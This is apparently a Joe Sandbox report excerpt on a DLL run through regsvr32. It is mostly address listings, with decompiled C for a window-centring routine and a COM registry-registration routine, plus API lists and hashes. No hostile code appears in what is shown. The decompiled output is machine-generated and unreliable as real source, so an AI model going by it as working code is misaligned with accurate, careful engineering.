                                                                                                                0x10033360
                                                                                                                0x1003336b
                                                                                                                0x1003336e
                                                                                                                0x10033371
                                                                                                                0x1003337b
                                                                                                                0x1003337e
                                                                                                                0x10033383
                                                                                                                0x10033388
                                                                                                                0x1003338a
                                                                                                                0x1003338d
                                                                                                                0x10033397
                                                                                                                0x1003339d
                                                                                                                0x100333a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003338f
                                                                                                                0x1003338f
                                                                                                                0x10033395
                                                                                                                0x100333a6
                                                                                                                0x100333a6
                                                                                                                0x100333a8
                                                                                                                0x10033455
                                                                                                                0x10033457
                                                                                                                0x10033459
                                                                                                                0x1003345c
                                                                                                                0x10033461
                                                                                                                0x10033464
                                                                                                                0x1003346a
                                                                                                                0x1003346a
                                                                                                                0x1003346c
                                                                                                                0x10033473
                                                                                                                0x100334fd
                                                                                                                0x10033502
                                                                                                                0x10033506
                                                                                                                0x10033509
                                                                                                                0x10033646
                                                                                                                0x10033649
                                                                                                                0x00000000
                                                                                                                0x1003364f
                                                                                                                0x1003364f
                                                                                                                0x10033652
                                                                                                                0x10033702
                                                                                                                0x00000000
                                                                                                                0x10033658
                                                                                                                0x10033658
                                                                                                                0x1003365b
                                                                                                                0x10033709
                                                                                                                0x1003370d
                                                                                                                0x10033712
                                                                                                                0x10033714
                                                                                                                0x00000000
                                                                                                                0x1003371a
                                                                                                                0x1003371a
                                                                                                                0x1003371e
                                                                                                                0x10033721
                                                                                                                0x10033723
                                                                                                                0x1003372c
                                                                                                                0x10033725
                                                                                                                0x10033725
                                                                                                                0x10033725
                                                                                                                0x10033731
                                                                                                                0x10033733
                                                                                                                0x10033735
                                                                                                                0x00000000
                                                                                                                0x1003373b
                                                                                                                0x1003373b
                                                                                                                0x1003373f
                                                                                                                0x10033741
                                                                                                                0x10033745
                                                                                                                0x10033745
                                                                                                                0x1003374a
                                                                                                                0x1003374e
                                                                                                                0x1003375e
                                                                                                                0x10033760
                                                                                                                0x10033762
                                                                                                                0x1003376f
                                                                                                                0x10033775
                                                                                                                0x10033764
                                                                                                                0x10033765
                                                                                                                0x10033765
                                                                                                                0x1003377a
                                                                                                                0x1003377c
                                                                                                                0x1003377e
                                                                                                                0x00000000
                                                                                                                0x10033784
                                                                                                                0x1003378a
                                                                                                                0x1003378d
                                                                                                                0x10033790
                                                                                                                0x10033795
                                                                                                                0x10033798
                                                                                                                0x100337a5
                                                                                                                0x100337a5
                                                                                                                0x00000000
                                                                                                                0x10033798
                                                                                                                0x10033750
                                                                                                                0x10033750
                                                                                                                0x10033756
                                                                                                                0x00000000
                                                                                                                0x10033756
                                                                                                                0x1003374e
                                                                                                                0x10033735
                                                                                                                0x10033661
                                                                                                                0x10033661
                                                                                                                0x10033664
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033664
                                                                                                                0x1003365b
                                                                                                                0x10033652
                                                                                                                0x00000000
                                                                                                                0x1003350f
                                                                                                                0x1003350f
                                                                                                                0x1003369e
                                                                                                                0x1003369e
                                                                                                                0x1003369e
                                                                                                                0x00000000
                                                                                                                0x10033515
                                                                                                                0x10033515
                                                                                                                0x10033518
                                                                                                                0x00000000
                                                                                                                0x1003351e
                                                                                                                0x1003351e
                                                                                                                0x10033521
                                                                                                                0x100335c0
                                                                                                                0x100335c2
                                                                                                                0x00000000
                                                                                                                0x100335c8
                                                                                                                0x100335ca
                                                                                                                0x100335d0
                                                                                                                0x100335d5
                                                                                                                0x100335d8
                                                                                                                0x100335db
                                                                                                                0x100335e0
                                                                                                                0x100335e5
                                                                                                                0x100335e7
                                                                                                                0x00000000
                                                                                                                0x100335ed
                                                                                                                0x100335ed
                                                                                                                0x100335f1
                                                                                                                0x10033606
                                                                                                                0x10033608
                                                                                                                0x1003360a
                                                                                                                0x10033618
                                                                                                                0x1003361a
                                                                                                                0x1003360c
                                                                                                                0x1003360d
                                                                                                                0x1003360d
                                                                                                                0x1003361f
                                                                                                                0x10033621
                                                                                                                0x10033623
                                                                                                                0x1003362c
                                                                                                                0x10033631
                                                                                                                0x1003363a
                                                                                                                0x10033640
                                                                                                                0x10033640
                                                                                                                0x100335f3
                                                                                                                0x100335f3
                                                                                                                0x100335f9
                                                                                                                0x100335fb
                                                                                                                0x100335fb
                                                                                                                0x00000000
                                                                                                                0x100335f1
                                                                                                                0x100335e7
                                                                                                                0x00000000
                                                                                                                0x10033527
                                                                                                                0x10033527
                                                                                                                0x1003352a
                                                                                                                0x1003366a
                                                                                                                0x1003366a
                                                                                                                0x1003366c
                                                                                                                0x00000000
                                                                                                                0x10033672
                                                                                                                0x10033675
                                                                                                                0x1003367a
                                                                                                                0x1003367c
                                                                                                                0x1003367d
                                                                                                                0x1003368e
                                                                                                                0x1003367f
                                                                                                                0x1003367f
                                                                                                                0x10033682
                                                                                                                0x10033684
                                                                                                                0x10033684
                                                                                                                0x10033693
                                                                                                                0x10033695
                                                                                                                0x10033697
                                                                                                                0x1003369a
                                                                                                                0x100336b5
                                                                                                                0x100336b5
                                                                                                                0x100336b7
                                                                                                                0x100336bc
                                                                                                                0x100336be
                                                                                                                0x100336cc
                                                                                                                0x100336cf
                                                                                                                0x00000000
                                                                                                                0x100336d5
                                                                                                                0x100336d5
                                                                                                                0x100336d6
                                                                                                                0x100336d7
                                                                                                                0x100336d8
                                                                                                                0x100336da
                                                                                                                0x100336df
                                                                                                                0x100336e0
                                                                                                                0x100336e3
                                                                                                                0x100336eb
                                                                                                                0x00000000
                                                                                                                0x100336eb
                                                                                                                0x100336c0
                                                                                                                0x100336c1
                                                                                                                0x00000000
                                                                                                                0x100336c1
                                                                                                                0x1003369c
                                                                                                                0x100336a0
                                                                                                                0x100336ab
                                                                                                                0x100336ad
                                                                                                                0x100336af
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100336af
                                                                                                                0x1003369a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003352a
                                                                                                                0x10033521
                                                                                                                0x10033518
                                                                                                                0x1003350f
                                                                                                                0x00000000
                                                                                                                0x10033479
                                                                                                                0x1003347a
                                                                                                                0x1003347a
                                                                                                                0x1003347b
                                                                                                                0x100334a7
                                                                                                                0x100334ab
                                                                                                                0x100334b0
                                                                                                                0x100334b7
                                                                                                                0x100334bd
                                                                                                                0x100334bd
                                                                                                                0x100334c1
                                                                                                                0x100334c5
                                                                                                                0x100334cb
                                                                                                                0x100334cb
                                                                                                                0x100334cf
                                                                                                                0x00000000
                                                                                                                0x100334d5
                                                                                                                0x100334d5
                                                                                                                0x100334dc
                                                                                                                0x100334e1
                                                                                                                0x100334e3
                                                                                                                0x00000000
                                                                                                                0x100334e5
                                                                                                                0x100334e5
                                                                                                                0x100334e8
                                                                                                                0x100334ea
                                                                                                                0x00000000
                                                                                                                0x100334ec
                                                                                                                0x100334ed
                                                                                                                0x100334ef
                                                                                                                0x100337ab
                                                                                                                0x100337ab
                                                                                                                0x100337ab
                                                                                                                0x100334ea
                                                                                                                0x00000000
                                                                                                                0x100334e3
                                                                                                                0x100334c7
                                                                                                                0x100334c7
                                                                                                                0x100334c9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100334c9
                                                                                                                0x100334b9
                                                                                                                0x100334b9
                                                                                                                0x100334bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100334bb
                                                                                                                0x1003347d
                                                                                                                0x1003347d
                                                                                                                0x10033480
                                                                                                                0x10033530
                                                                                                                0x10033530
                                                                                                                0x10033533
                                                                                                                0x10033539
                                                                                                                0x10033541
                                                                                                                0x10033547
                                                                                                                0x10033549
                                                                                                                0x1003354c
                                                                                                                0x10033557
                                                                                                                0x1003355c
                                                                                                                0x1003355f
                                                                                                                0x1003356a
                                                                                                                0x1003356f
                                                                                                                0x1003356f
                                                                                                                0x1003355f
                                                                                                                0x1003354c
                                                                                                                0x10033570
                                                                                                                0x10033579
                                                                                                                0x1003357b
                                                                                                                0x1003357d
                                                                                                                0x10033591
                                                                                                                0x10033597
                                                                                                                0x1003359b
                                                                                                                0x1003359d
                                                                                                                0x1003359f
                                                                                                                0x100335b0
                                                                                                                0x100335b0
                                                                                                                0x1003359f
                                                                                                                0x100335b5
                                                                                                                0x10033486
                                                                                                                0x10033486
                                                                                                                0x10033489
                                                                                                                0x1003349c
                                                                                                                0x1003349c
                                                                                                                0x100334a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003348b
                                                                                                                0x1003348d
                                                                                                                0x10033493
                                                                                                                0x10033496
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033496
                                                                                                                0x10033489
                                                                                                                0x10033480
                                                                                                                0x1003347b
                                                                                                                0x100333ae
                                                                                                                0x100333b4
                                                                                                                0x100333b6
                                                                                                                0x100333b6
                                                                                                                0x100333ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100333c2
                                                                                                                0x100333c7
                                                                                                                0x100333ca
                                                                                                                0x100333d7
                                                                                                                0x100333d9
                                                                                                                0x100333db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100333db
                                                                                                                0x00000000
                                                                                                                0x100333ca
                                                                                                                0x100333dd
                                                                                                                0x100333df
                                                                                                                0x10033404
                                                                                                                0x10033404
                                                                                                                0x1003340b
                                                                                                                0x1003341b
                                                                                                                0x1003341b
                                                                                                                0x1003341d
                                                                                                                0x00000000
                                                                                                                0x1003341f
                                                                                                                0x1003341f
                                                                                                                0x10033422
                                                                                                                0x10033424
                                                                                                                0x00000000
                                                                                                                0x10033426
                                                                                                                0x10033429
                                                                                                                0x1003342d
                                                                                                                0x10033431
                                                                                                                0x1003343c
                                                                                                                0x1003343c
                                                                                                                0x10033440
                                                                                                                0x00000000
                                                                                                                0x10033442
                                                                                                                0x10033442
                                                                                                                0x10033449
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033449
                                                                                                                0x10033433
                                                                                                                0x10033433
                                                                                                                0x1003343a
                                                                                                                0x1003344b
                                                                                                                0x1003344b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003343a
                                                                                                                0x10033431
                                                                                                                0x10033424
                                                                                                                0x1003340d
                                                                                                                0x1003340d
                                                                                                                0x10033410
                                                                                                                0x00000000
                                                                                                                0x10033412
                                                                                                                0x10033412
                                                                                                                0x10033419
                                                                                                                0x10033452
                                                                                                                0x10033452
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033419
                                                                                                                0x10033410
                                                                                                                0x100333e1
                                                                                                                0x100333e1
                                                                                                                0x100333e4
                                                                                                                0x100333e6
                                                                                                                0x00000000
                                                                                                                0x100333e8
                                                                                                                0x100333e8
                                                                                                                0x100333ec
                                                                                                                0x00000000
                                                                                                                0x100333ee
                                                                                                                0x100333ee
                                                                                                                0x100333f4
                                                                                                                0x100333f7
                                                                                                                0x100333fa
                                                                                                                0x100333fc
                                                                                                                0x00000000
                                                                                                                0x100333fe
                                                                                                                0x100333fe
                                                                                                                0x100333fe
                                                                                                                0x100333fc
                                                                                                                0x100333ec
                                                                                                                0x100333e6
                                                                                                                0x100333df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033395
                                                                                                                0x100335bd
                                                                                                                0x10033319
                                                                                                                0x10033319
                                                                                                                0x1003331e
                                                                                                                0x10033321
                                                                                                                0x10033326
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033326
                                                                                                                0x100332f3
                                                                                                                0x100332f3
                                                                                                                0x100332f8
                                                                                                                0x100332ff
                                                                                                                0x100332fa
                                                                                                                0x100332fa
                                                                                                                0x100332fa
                                                                                                                0x10033303
                                                                                                                0x00000000
                                                                                                                0x10033305
                                                                                                                0x1003330e
                                                                                                                0x10033328
                                                                                                                0x10033328
                                                                                                                0x1003332b
                                                                                                                0x00000000
                                                                                                                0x1003332d
                                                                                                                0x1003332d
                                                                                                                0x10033330
                                                                                                                0x10033332
                                                                                                                0x10033332
                                                                                                                0x10033335
                                                                                                                0x10033336
                                                                                                                0x1003333c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003333c
                                                                                                                0x10033310
                                                                                                                0x10033310
                                                                                                                0x10033310
                                                                                                                0x10033340
                                                                                                                0x10033344
                                                                                                                0x10033344
                                                                                                                0x1003330e
                                                                                                                0x10033303
                                                                                                                0x100332df
                                                                                                                0x100332df
                                                                                                                0x100332e9
                                                                                                                0x100332ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100332ed
                                                                                                                0x00000000
                                                                                                                0x100332dd
                                                                                                                0x1003333e
                                                                                                                0x1003333e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 656273425-0
                                                                                                                • Opcode ID: 24ff8eb11f4b22da7dd3a85a51e3518b23e58b2ea24e9437b63622b344030637
                                                                                                                • Instruction ID: d662ab5222291105f51a5311d2acb9bc16b1c6a0e98c36f1c822bc35365c2189
                                                                                                                • Opcode Fuzzy Hash: 24ff8eb11f4b22da7dd3a85a51e3518b23e58b2ea24e9437b63622b344030637
                                                                                                                • Instruction Fuzzy Hash: 0AF18075900656AFDB23DB60C8C5AAE7BF5EF44292F11C029E846AF361DB34ED81CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100139B0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E100139B0(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E100177F8(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t121 =  *(_t58 + 0x20);
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10011243(_t121, E100111D8(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10012730();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10011243(_t121, E100111D8(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E10017C59(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                0x100139b0
                                                                                                                0x100139b0
                                                                                                                0x100139b7
                                                                                                                0x100139ba
                                                                                                                0x100139c2
                                                                                                                0x100139c5
                                                                                                                0x100139ca
                                                                                                                0x100139d8
                                                                                                                0x100139ea
                                                                                                                0x100139da
                                                                                                                0x100139dd
                                                                                                                0x100139dd
                                                                                                                0x100139f0
                                                                                                                0x100139f4
                                                                                                                0x10013a00
                                                                                                                0x10013a08
                                                                                                                0x10013a0a
                                                                                                                0x10013a0a
                                                                                                                0x10013a08
                                                                                                                0x100139cc
                                                                                                                0x100139cc
                                                                                                                0x100139cc
                                                                                                                0x10013a0c
                                                                                                                0x10013a1a
                                                                                                                0x10013a23
                                                                                                                0x10013ac3
                                                                                                                0x10013aca
                                                                                                                0x10013ad1
                                                                                                                0x10013adb
                                                                                                                0x10013a29
                                                                                                                0x10013a2b
                                                                                                                0x10013a30
                                                                                                                0x10013a3b
                                                                                                                0x10013a44
                                                                                                                0x10013a44
                                                                                                                0x10013a3b
                                                                                                                0x10013a48
                                                                                                                0x10013a4f
                                                                                                                0x10013a90
                                                                                                                0x10013a9f
                                                                                                                0x10013aac
                                                                                                                0x10013a51
                                                                                                                0x10013a51
                                                                                                                0x10013a58
                                                                                                                0x10013a5a
                                                                                                                0x10013a5a
                                                                                                                0x10013a6a
                                                                                                                0x10013a7d
                                                                                                                0x10013a87
                                                                                                                0x10013a87
                                                                                                                0x10013a4f
                                                                                                                0x10013aea
                                                                                                                0x10013aef
                                                                                                                0x10013af4
                                                                                                                0x10013af8
                                                                                                                0x10013afb
                                                                                                                0x10013b02
                                                                                                                0x10013b0a
                                                                                                                0x10013b12
                                                                                                                0x10013b1a
                                                                                                                0x10013b21
                                                                                                                0x10013b26
                                                                                                                0x10013b32
                                                                                                                0x10013b3a
                                                                                                                0x10013b3a
                                                                                                                0x10013b28
                                                                                                                0x10013b28
                                                                                                                0x10013b28
                                                                                                                0x10013b40
                                                                                                                0x10013b4f
                                                                                                                0x10013b57
                                                                                                                0x10013b57
                                                                                                                0x10013b42
                                                                                                                0x10013b42
                                                                                                                0x10013b42
                                                                                                                0x10013b6f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetParent.USER32(?), ref: 100139DD
                                                                                                                • SendMessageA.USER32 ref: 10013A00
                                                                                                                • GetWindowRect.USER32 ref: 10013A1A
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10013A30
                                                                                                                • CopyRect.USER32(?,?), ref: 10013A7D
                                                                                                                • CopyRect.USER32(?,?), ref: 10013A87
                                                                                                                • GetWindowRect.USER32 ref: 10013A90
                                                                                                                • CopyRect.USER32(?,?), ref: 10013AAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                • String ID: (
                                                                                                                • API String ID: 808654186-3887548279
                                                                                                                • Opcode ID: 7d36992815b7c82f4186bf24b3e9f02ba7339f80983b16d8183d78d4b2b26388
                                                                                                                • Instruction ID: cdef7b8ec397d2e35f5d148a9b825cf63a8d49ca7f47ea8acb5fdff55329149a
                                                                                                                • Opcode Fuzzy Hash: 7d36992815b7c82f4186bf24b3e9f02ba7339f80983b16d8183d78d4b2b26388
                                                                                                                • Instruction Fuzzy Hash: 02516F72900219AFDB00CBA8CD85EEEBBB9FF48250F154155F915FB291DB30ED818B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10044D1A Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 98registrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10044D1A(void* __ecx, void* _a4, void* _a8, void* _a12) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				CHAR* _t23;
				signed int _t25;
				void* _t26;
				signed int _t31;
				int _t33;
				CHAR* _t36;
				char* _t42;
				CHAR* _t48;

				_t20 = _a12;
				_v8 = _t20;
				_t3 =  &_v8;
				 *_t3 = _v8 & 0x00000001;
				_t42 = "Insertable";
				if( *_t3 == 0) {
					L9:
					_t36 = 0;
					__eflags = _t20 & 0x00000002;
					if((_t20 & 0x00000002) != 0) {
						_t36 = "Apartment";
					}
					__eflags = _t20 & 0x00000004;
					if((_t20 & 0x00000004) != 0) {
						_t36 = 0x100b9d90;
					}
					__eflags = (_t20 & 0x00000006) - 6;
					if((_t20 & 0x00000006) == 6) {
						_t36 = 0x100b9d88;
					}
					__eflags = _t36;
					if(_t36 == 0) {
						L21:
						_t23 = 1;
						goto L7;
					} else {
						_t25 = RegOpenKeyExA(_a8, "InprocServer32", 0, 0x20006,  &_a12);
						asm("sbb esi, esi");
						_t48 =  ~_t25 + 1;
						__eflags = _t48;
						if(__eflags == 0) {
							_t26 = E1001E302(_t36, _t42, _t48, __eflags);
							__eflags =  *((char*)(_t26 + 0x14));
							if( *((char*)(_t26 + 0x14)) == 0) {
								_t48 = 1;
								__eflags = 1;
							}
						} else {
							_t31 = RegSetValueExA(_a12, "ThreadingModel", 0, 1, _t36, lstrlenA(_t36) + 1);
							asm("sbb esi, esi");
							_t48 =  ~_t31 + 1;
							RegCloseKey(_a12);
						}
						__eflags = _t48;
						if(_t48 == 0) {
							L4:
							if(_v8 != 0) {
								RegDeleteValueA(_a8, _t42);
								RegDeleteValueA(_a4, _t42);
							}
							_t23 = _t48;
							L7:
							return _t23;
						} else {
							goto L21;
						}
					}
				}
				_t33 = RegSetValueA(_a4, _t42, 1, 0x1009c448, 0);
				if(_t33 != 0 || RegSetValueA(_a8, _t42, 1, 0x1009c448, _t33) != 0) {
					_t48 = 0;
					goto L4;
				} else {
					_t20 = _a12;
					goto L9;
				}
			}

















                                                                                                                0x10044d1e
                                                                                                                0x10044d23
                                                                                                                0x10044d26
                                                                                                                0x10044d26
                                                                                                                0x10044d2b
                                                                                                                0x10044d30
                                                                                                                0x10044d80
                                                                                                                0x10044d80
                                                                                                                0x10044d82
                                                                                                                0x10044d84
                                                                                                                0x10044d86
                                                                                                                0x10044d86
                                                                                                                0x10044d8b
                                                                                                                0x10044d8d
                                                                                                                0x10044d8f
                                                                                                                0x10044d8f
                                                                                                                0x10044d97
                                                                                                                0x10044d99
                                                                                                                0x10044d9b
                                                                                                                0x10044d9b
                                                                                                                0x10044da0
                                                                                                                0x10044da2
                                                                                                                0x10044e0a
                                                                                                                0x10044e0c
                                                                                                                0x00000000
                                                                                                                0x10044da4
                                                                                                                0x10044db7
                                                                                                                0x10044dc1
                                                                                                                0x10044dc3
                                                                                                                0x10044dc3
                                                                                                                0x10044dc4
                                                                                                                0x10044df4
                                                                                                                0x10044df9
                                                                                                                0x10044dfd
                                                                                                                0x10044e01
                                                                                                                0x10044e01
                                                                                                                0x10044e01
                                                                                                                0x10044dc6
                                                                                                                0x10044ddc
                                                                                                                0x10044de9
                                                                                                                0x10044deb
                                                                                                                0x10044dec
                                                                                                                0x10044dec
                                                                                                                0x10044e02
                                                                                                                0x10044e04
                                                                                                                0x10044d5c
                                                                                                                0x10044d60
                                                                                                                0x10044d6c
                                                                                                                0x10044d72
                                                                                                                0x10044d72
                                                                                                                0x10044d74
                                                                                                                0x10044d76
                                                                                                                0x10044d7a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10044e04
                                                                                                                0x10044da2
                                                                                                                0x10044d46
                                                                                                                0x10044d4a
                                                                                                                0x10044d5a
                                                                                                                0x00000000
                                                                                                                0x10044d7d
                                                                                                                0x10044d7d
                                                                                                                0x00000000
                                                                                                                0x10044d7d

                                                                                                                APIs
                                                                                                                • RegSetValueA.ADVAPI32(?,Insertable,00000001,1009C448,00000000), ref: 10044D46
                                                                                                                • RegSetValueA.ADVAPI32(?,Insertable,00000001,1009C448,00000000), ref: 10044D54
                                                                                                                • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10044D6C
                                                                                                                • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10044D72
                                                                                                                • RegOpenKeyExA.ADVAPI32(?,InprocServer32,00000000,00020006,?), ref: 10044DB7
                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 10044DC7
                                                                                                                • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,00000000,00000001), ref: 10044DDC
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10044DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
